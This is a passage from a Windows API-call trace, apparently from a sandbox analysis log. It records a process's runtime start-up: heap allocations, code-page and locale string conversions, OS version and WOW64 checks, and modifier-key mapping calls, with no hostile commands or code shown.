(HeapHandle=0x970000, Flags=0x8, Size=0x62) returned 0x9725c8 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x28) returned 0x972638 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x48) returned 0x972668 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x1a) returned 0x9726b8 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x2e) returned 0x9726e0 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x56) returned 0x972718 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x2a) returned 0x972778 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x2e) returned 0x9727b0 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x44) returned 0x9727e8 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x1c) returned 0x972838 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x182) returned 0x972860 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x7c) returned 0x9729f0 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x36) returned 0x972a78 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x3a) returned 0x972ab8 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x90) returned 0x972b00 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x24) returned 0x972b98 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x30) returned 0x972bc8 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x36) returned 0x972c00 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x48) returned 0x972c40 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x52) returned 0x972c90 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x3c) returned 0x972cf0 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x18) returned 0x972d38 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0xd6) returned 0x972d58 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x2e) returned 0x972e38 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x1e) returned 0x972e70 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x2c) returned 0x972e98 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x50) returned 0x972ed0 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x4e) returned 0x972f28 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x24) returned 0x972f80 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x42) returned 0x972fb0 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x20) returned 0x973000 [0120.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x38) returned 0x973028 [0121.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x24) returned 0x973068 [0121.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x970fd0 | out: hHeap=0x970000) returned 1 [0121.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x80) returned 0x970fd0 [0121.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x800) returned 0x971058 [0121.000] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0121.000] GetLastError () returned 0x0 [0121.000] SetLastError (dwErrCode=0x0) [0121.000] GetLastError () returned 0x0 [0121.000] SetLastError (dwErrCode=0x0) [0121.000] GetLastError () returned 0x0 [0121.000] SetLastError (dwErrCode=0x0) [0121.000] GetACP () returned 0x4e4 [0121.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x220) returned 0x971860 [0121.000] GetLastError () returned 0x0 [0121.001] SetLastError (dwErrCode=0x0) [0121.001] IsValidCodePage (CodePage=0x4e4) returned 1 [0121.001] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x8cfe7c | out: lpCPInfo=0x8cfe7c) returned 1 [0121.001] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x8cf948 | out: lpCPInfo=0x8cf948) returned 1 [0121.001] GetLastError () returned 0x0 [0121.001] SetLastError (dwErrCode=0x0) [0121.001] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.001] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x8cf6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ") returned 256 [0121.001] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ", cchSrc=256, lpCharType=0x8cf95c | out: lpCharType=0x8cf95c) returned 1 [0121.001] GetLastError () returned 0x0 [0121.001] SetLastError (dwErrCode=0x0) [0121.001] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.001] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x8cf698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0121.001] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0121.001] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x8cf488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0121.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x8cfc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿë", lpUsedDefaultChar=0x0) returned 256 [0121.002] GetLastError () returned 0x0 [0121.002] SetLastError (dwErrCode=0x0) [0121.002] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.002] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x8cf6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0121.002] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0121.002] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x8cf4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0121.002] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x8cfb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿë", lpUsedDefaultChar=0x0) returned 256 [0121.003] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x41f20e) returned 0x0 [0121.003] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x971a88 [0121.003] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971ac8 [0121.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971ae0 [0121.003] GetVersionExW (in: lpVersionInformation=0x8cfd84*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x2f2e2d2c, dwMinorVersion=0x33323130, dwBuildNumber=0x37363534, dwPlatformId=0x0, szCSDVersion="\x01") | out: lpVersionInformation=0x8cfd84*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0121.003] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0121.004] GetProcAddress (hModule=0x772d0000, lpProcName="IsWow64Process") returned 0x772e5a20 [0121.004] GetCurrentProcess () returned 0xffffffff [0121.004] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x8cfedc | out: Wow64Process=0x8cfedc) returned 1 [0121.006] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0121.006] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0121.006] GetNativeSystemInfo (in: lpSystemInfo=0x8cfea0 | out: lpSystemInfo=0x8cfea0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0121.007] FreeLibrary (hLibModule=0x772d0000) returned 1 [0121.007] FreeLibrary (hLibModule=0x772d0000) returned 1 [0121.007] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x971af0 [0121.007] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971b08 [0121.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971b20 [0121.007] RtlSizeHeap (HeapHandle=0x970000, Flags=0x0, MemoryPointer=0x970fd0) returned 0x80 [0121.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971b30 [0121.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971b48 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971b58 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971b70 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971b80 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971b98 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971ba8 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971bc0 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971bd0 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971be8 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971bf8 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971c10 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971c20 [0121.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971c38 [0121.008] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0121.008] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0121.009] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0121.009] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0121.009] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0121.009] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0121.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971c48 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971c60 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971c70 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971c88 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971c98 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971cb0 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971cc0 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971cd8 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971ce8 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971d00 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971d10 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x971d28 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x971d38 [0121.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x975fc8 [0121.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9704a0 [0121.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x975fd8 [0121.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976058 [0121.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976748 [0121.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976028 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976628 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976088 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976698 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976160 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976648 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976788 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976040 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976678 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x976130 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976618 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x9761a8 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976798 [0121.012] RtlAllocateHeap (HeapHandle=0x970000, 